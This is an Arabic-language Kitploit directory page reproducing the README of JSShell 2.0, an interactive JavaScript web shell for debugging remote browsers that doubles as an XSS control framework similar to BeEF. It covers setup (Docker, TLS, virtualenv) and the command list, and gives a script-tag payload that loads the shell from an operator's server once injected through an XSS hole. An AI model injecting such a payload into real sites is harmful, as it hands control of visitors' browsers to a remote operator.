Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
JSShell — شل ويب جافاسكريبت تفاعلي متعدد المستخدمين | Kitploit
أدوات/GitHubGitHub/den1al/jsshell
الاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubden1al/jsshell

JSShell

شل ويب جافاسكريبت تفاعلي متعدد المستخدمين

عرض المستودع
36470منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

JSShell 2.0

made-with-python Generic badge Generic badge

صدفة جافا سكريبت تفاعلية متعددة المستخدمين تعتمد على الويب. تم إنشاؤها في البداية لتصحيح المتصفحات البعيدة غير التقليدية أثناء التجارب والأبحاث. يمكن ربط هذه الأداة بسهولة بحمولة XSS (البرمجة النصية عبر المواقع) لتحقيق تنفيذ تعليمات برمجية عن بُعد في المتصفح (على غرار إطار عمل BeeF).

تم إنشاء الإصدار 2.0 من الصفر، مع إضافة ميزات جديدة ومثيرة، والاستقرار، وقابلية الصيانة.

الإصدار: 2.0

المؤلف

دانيال أبيلس.

فيديو الصدفة

asciicast

الميزات

  • دعم عدة عملاء
  • دعم كائنات DOM الدورية
  • نصوص ما قبل الإطلاق
  • قائمة انتظار الأوامر والسياق
  • قابل للتوسع باستخدام الإضافات
  • قابل للحقن عبر وسم <script>
  • تفريغ مخرجات الأوامر إلى ملف
  • ترقيم صفحات الصدفة
  • دعم HTTPS! Generic badge

التثبيت والإعداد

ملف التكوين

في مجلد resources، قم بتحديث ملف config.json بالتكوين المطلوب:

  • مضيف قاعدة البيانات - إذا كنت تستخدم طريقة النشر عبر Docker، اختر مضيف قاعدة البيانات كـ db (وهو اسم المضيف الداخلي).
  • رابط العودة - الرابط الذي ستتبعه الطلبات. يقوم ملف shell.js باستدعاءات AJAX للتسجيل والاستعلام عن الأوامر الجديدة. عادة ما يكون http[s]://{IP_SERVER}:{PORT}.
  • نص بدء التشغيل - نص يتم تشغيله تلقائيًا عند بدء تشغيل عميل JSShell CLI.
  • النطاق - إذا كنت ترغب في إنشاء شهادات TLS، فهذا هو اسم النطاق الذي سيستخدمه الخادم.
  • من الممكن أيضًا الإشارة إلى قاعدة بيانات عن بُعد إذا رغبت.

Let's Encrypt

الآن يدعم JSShell TLS، مما يعني أنه يمكنك إنشاء شهادات TLS وإطعامها لخادم الويب. سيقوم خادم الويب باستنتاج اسم النطاق من ملف config.json. لإنشاء الشهادة، استخدم البرنامج النصي create_cert.py في مجلد scripts:

root@kitploit:~
$ cd scripts
$ python create_cert.py --domain <نطاقك> --email <بريدك الإلكتروني>
حقل البريد الإلكتروني اختياري.

يرجى ملاحظة أنه يجب إيقاف تشغيل خادم الويب حتى يعمل البرنامج النصي بشكل صحيح. في هذه المرحلة، قمنا بنجاح بإنشاء شهاداتنا! التعديلات الوحيدة التي نحتاج إلى إجرائها هي:

  • في ملف config.json، قم بتغيير مخطط حقل URL إلى https.
  • في ملف docker-compose.yml قم بتغيير المنفذ المكشوف لحاوية web إلى 443.

Docker

يدعم هذا الإصدار الجديد تثبيت وتشغيل JSShell عبر docker و docker-compose. الآن، لتثبيت وتشغيل إطار عمل JSShell بأكمله، قم بتشغيل الأمر التالي:

root@kitploit:~
$ ./scripts/start_docker_shell.sh

سيقوم هذا بما يلي:

  • تشغيل قاعدة البيانات وإنشائها في الخلفية
  • تشغيل خادم API الويب الذي يعالج الاتصالات الواردة في الخلفية
  • إنشاء مثيل جديد لحاوية واجهة سطر الأوامر لـ JSShell

الطريقة العادية

إذا كنت لا تزال ترغب في استخدام طريقة التثبيت التقليدية، تأكد من تشغيل قاعدة بيانات MongoDB وتحديث ملف config.json الموجود في مجلد resources.

أوصي باستخدام بيئة افتراضية مع pyenv:

root@kitploit:~
$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv

أو باستخدام virtualenv:

root@kitploit:~
$ virtualenv -p python3.6 venv
$ source venv/bin/activate

ثم قم بتثبيت المتطلبات:

root@kitploit:~
$ pip install -r requirements.txt

التشغيل

إذا استخدمت طريقة Docker، فلا حاجة لتنفيذ الإجراء التالي.

خادم الويب

بخلاف ذلك، بمجرد إعداد قاعدة البيانات، نحتاج إلى تشغيل خادم API الويب. للقيام بذلك، قم بتشغيل:

root@kitploit:~
$ python manage.py web

سينشئ هذا خادم ويب يستمع للاتصالات الواردة ويخدم كود JSShell الخاص بنا.

الصدفة (Shell)

الآن لبدء تشغيل واجهة سطر الأوامر JSShell، قم بتشغيل نفس البرنامج النصي ولكن مع علامة shell:

root@kitploit:~
$ python manage.py shell

الاستخدام

بعد الإعداد وتشغيل المكونات المطلوبة، أدخل الأمر help لرؤية الأوامر المتاحة:

root@kitploit:~
     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
     ║╚═╗└─┐├─┤├┤ │  │  
    ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles
    
>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit                Edit a file in a text editor
help                List available commands or provide detailed help for a specific command
history             View, run, edit, save, or clear previously entered commands
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
quit                Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back                Un-select the current selected client
clients             List and control the clients that have registered to our system
commands            Show the executed commands on the selected client
dump                Dumps a command to the disk
execute             Execute commands on the selected client
select              Select a client as the current client

>> 

التدفق

يدعم JSShell طريقتين للتشغيل:

  1. صدفة قابلة للحقن (مشابهة لإطار عمل BeeF)
  2. صدفة مستضافة (للتصحيح)

صدفة قابلة للحقن

على غرار أطر التحكم في XSS الأخرى (مثل BeeF)، يمكن لـ JSShell إدارة استغلالات XSS الناجحة. على سبيل المثال، إذا كان بإمكانك حقن وسم script، فاحقن المورد التالي في حمولتك، وسيظهر عميل جديد في وحدة التحكم الخاصة بك:

<script src="http[s]://{IP_SERVER}:{PORT}/content/js"></script>

صدفة مستضافة

إذا كنت ترغب في تصحيح المتصفحات غير التقليدية والغريبة، يمكنك ببساطة الانتقال إلى http[s]://{IP_SERVER}:{PORT}/ وسيظهر عميل جديد في عميل JSShell CLI الخاص بك. والآن يمكن تصحيحه عبر وحدة تحكم JSShell الخاصة بنا.

الإسناد

Canop لـ JSON.prune

استخدمها على مسؤوليتك الخاصة وتحت مسؤوليتك.
تنزيل الأداة